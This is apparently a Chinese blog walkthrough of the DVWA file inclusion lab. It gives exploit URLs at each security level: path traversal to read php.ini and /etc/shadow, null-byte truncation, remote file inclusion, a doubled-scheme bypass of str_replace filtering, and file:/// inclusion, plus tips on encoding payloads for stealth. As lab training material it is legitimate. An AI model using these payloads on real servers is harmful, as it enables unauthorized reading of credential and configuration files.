DVWA-文件包含漏洞

已于 2023-04-11 21:09:11 修改
阅读量1w 收藏 34
点赞数 12
分类专栏: 靶场 文章标签: 安全漏洞 web安全
于 2022-03-05 01:06:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43660551/article/details/123192516
版权

文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。

分类:

(1)本地文件包含

(2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。

一、low

看下服务器端核心代码:page为做任何过滤。

        图中 file1.php、file2.php、file3.php 是服务器希望用户点击,服务器包含相应的文件,返回结果。服务器包含文件时无论文件后缀是否是php,均当做php文件来执行。当文件内容为php,返回正常执行结果;当文件内容不是php,则原封不动打印文件内容。

        点击file1.php。

1、本地文件包含

构造url:http://127.0.0.1/DVWA/vulnerabilities/fi/?page=/etc/shaow ,其中/etc/shaow为linux的系统路径。

        报错。故服务器系统不是Linux。且文件的绝对路径为D:\PhPstudy\phpstudy_pro\WWW\DVWA\vulnerabilities\fi\index.php

        构造url(绝对路径):http://127.0.0.1/DVWA/vulnerabilities/fi/?page=D:\PhPstudy\phpstudy_pro\WWW\DVWA\php.ini,成功读取了服务器的php.ini文件。

         或者构造url(相对路径):http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\PhPstudy\phpstudy_pro\WWW\DVWA\php.ini

        “..\”代表上一层目录,“.\”代表下一层目录。

        若page参数要求为php后缀或者其他,在php版本小于5.3.4,时,可以用%00截断。如: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\PhPstudy\phpstudy_pro\WWW\DVWA\php.ini%00csg.php 。

1、远程文件包含

        当服务器的php配置中,allow_url_fopen和allow_url_include打开时,服务器会允许包含远程服务器上的文件。在远程服务器上上传一个phpinfo.txt文件。由于本人租不起服务器,故将其放在自己电脑上。

构造url:http://127.0.0.1/DVWA/vulnerabilities/fi/?page=C:\Users\ASUS\Desktop/phpinfo.txt

 

为了增加隐蔽性,可以百度一个在线编码工具,对url进行编码:
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=C%3A%5CUsers%5CASUS%5CDesktop%2Fphpinfo.txt

同样可成功执行。

二、medium

        看下服务器端核心代码:str_replace()函数对“http://”、“https://”、“../”、“..\”都进行了过滤删除。

         但str_replace()可以用双写绕过。且规则里绕过“../”、“..\”,则用绝对路径的方式包含文件不受此规则限制。(本文由于phpinfo.txt文件在本地,无http://或https://,故为http://127.0.0.1/DVWA/vulnerabilities/fi/?page=C:\Users\ASUS\Desktop\phpinfo.txt

若将phpinfo.txt上传到服务器(比如192.168.125.12),则构造下面的链接即可:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=hhttp://ttp://192.168.125.12/phpinfo.txt

三、high

        看下核心源码:这里使用fnmatch()函数对page参数进行过滤,要求page必须以“file”开头,服务器才会包含相应的文件。

 file协议:本地文件传输协议)主要用于访问本地计算机中的文件。基本格式为:file:///文件路径

故利用file协议,构造url:

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///D:\PhPstudy\phpstudy_pro\WWW\DVWA\php.ini

读取服务器配置文件成功。

四、impossible

        看下核心源码:这里使用白名单。page参数必须为:include.php 、 file1.php 、 file2.php 、 file3.php 。杜绝了文件包含漏洞。

发奋的鼹鼠
关注
  • 12
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-master.zip
03-13
DVWA是一款渗透测试的演练系统,用于常规WEB漏洞教学和WEB脆弱性测试。包含了SQL注入、文件上传、XSS等一些常见的安全漏洞
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1092
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
DVWA 简介及安装
刘箫-技术库
03-05 1202
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA靶机-文件包含漏洞(File Inclusion)
weixin_43726831的博客
10-15 3493
DVWA靶机-文件包含漏洞(File Inclusion) 暴力破解-Brute Force 命令注入漏洞-Command injection
漏洞复现篇——文件包含漏洞DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 3721
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
DVWA靶场------File Inclusion(文件包含漏洞
m0_65712192的博客
11-13 924
DVWA靶场------File Inclusion(文件包含漏洞
dvwa-文件包含漏洞
AI_SumSky的博客
11-26 877
文件包含漏洞 low级别 随便点了个文件发现有传导文件参数 Windows常见的敏感信息路径 系统版本:C:\boot.ini IIS配置文件:C:\windows\system32\inetsrv\MetaBase.xml 存储Windows系统初次安装的密码:C:\windows\repair\sam 查看php配置信息:C:\windows\php.ini Linux常见的敏感信息路径 系统用户信息:/etc/passwd DNS配置文件:/etc/resolv.conf ssh生成文件:/root
DVWA-文件包含
STTTM的博客
12-21 2259
  什么是文件包含?在文件包含里面,我们要想方设法把真正包含的文件掉包,换成恶意文件,服务器却不知道。 文件包含:是一种代码处理方式,当一个代码文件想要引用另外一个代码文件,就要用到包含,常见的包含函数有include、require等,参数是文件名。但是如果文件包含的参数用户可控且过滤不严,被攻击者偷梁换柱。 LOW等级: 首先进行正常的操作:点击fil1和file2时,仅仅是配...
dvwa文件包含漏洞
qq_51177088的博客
05-12 356
文件包含漏洞原理1.本地文件包含2. 远程文件包含3.日志文件包含 ??知识点实例 原理 当服务器开启allow_url_include时,通过PHP函数(如include)去动态包含文件,且该输入用户可控,即会造成文件包含漏洞 eg: #漏洞: <?php include $_GET['filename']; ?> #我们控制输入file为恶意文件test.php filename=test.php #test.php <?php phpinfo(); ?> 1.本地文件包
DVWA——文件包含
小纯的博客
03-21 3049
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数: PHP中文件包含函数有以下四种:require()、require_on
DVWA文件包含漏洞
weixin_56306210的博客
05-11 1438
DVWA文件包含漏洞
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVMA-渗透测试漏洞练习平台
12-02
DVMA-渗透测试漏洞练习平台, 其中内含XSS、SQL注入、文件上传、文件包含、CSRF和暴力破解等各个难度的测试环境
web安全-dvwa实战手
07-05
文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统中的文件,从而可能引发未授权访问或恶意代码执行的情况。 4。文件上传:介绍文件上传漏洞是如何允许攻击者上传恶意文件到目标服务器,并探讨可能导致的...
网络安全思考题
weixin_62304542的博客
04-27 1088
网络安全渗透思考题
网络安全之弱口令与命令爆破(中篇)(技术进阶)
weixin_70911257的博客
04-28 820
弱口令就是容易被人们所能猜到的密码呗,例如:admin,123456,888等等简单的密码。这种针对验证码的爆破只是最简单的一种,还有其他的验证码类型,能爆破,但是有点难,等以后再出一篇看看吧,下篇的内容是token防爆破,防爆破口令绕过,word,加密的zip压缩文件,windows登录密码,mysql数据库登录密码,ssh登录密码的弱口令爆破。下个星期有空再写吧,这篇内容不全还有一个知识点没讲到(出了点问题解决了再加上来吧)。!
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
今晚打老虎的专栏
05-01 886
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
【网络安全产品】---应用防火墙(WAF)
最新发布
嘿嘿嘿
05-04 570
Web应用防火墙(Web Application FirewallWAF可对网站或者App的业务流量进行恶意特征识别及防护,在对流量清洗和过滤后,将正常、安全的流量返回给服务器,避免网站服务器被恶意入侵导致性能异常等问题,从而保障网站的业务安全和数据安全
网络安全实训Day16
Yisitelz的博客
04-26 1776
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
05-17
是一种常见的Web应用程序漏洞,攻击者可以通过该漏洞Web应用程序中包含外部文件,从而访问敏感信息或执行恶意代码。DVWA(Damn Vulnerable Web Application)是一个专门用于漏洞测试的Web应用程序,其中包含了一些常见的Web安全漏洞,包括文件包含漏洞。 在DVWA中,文件包含漏洞主要存在于以下两个文件中: 1. /dvwa/vulnerabilities/fi/index.php 2. /dvwa/vulnerabilities/fi_base64/index.php 攻击者可以通过构造恶意请求,将要包含的文件路径作为参数传递给上述文件中的一个或多个参数,从而实现文件包含。如果攻击者能够成功包含恶意文件,就可以执行任意代码,进而控制Web应用程序或服务器。 为了防止文件包含漏洞,可以采取以下措施: 1. 避免使用用户输入来构造文件路径参数。 2. 对用户输入进行严格的输入验证和过滤。 3. 使用白名单机制来限制可以包含的文件路径。 4. 对文件路径进行加密或编码,以避免攻击者能够轻易地构造恶意请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值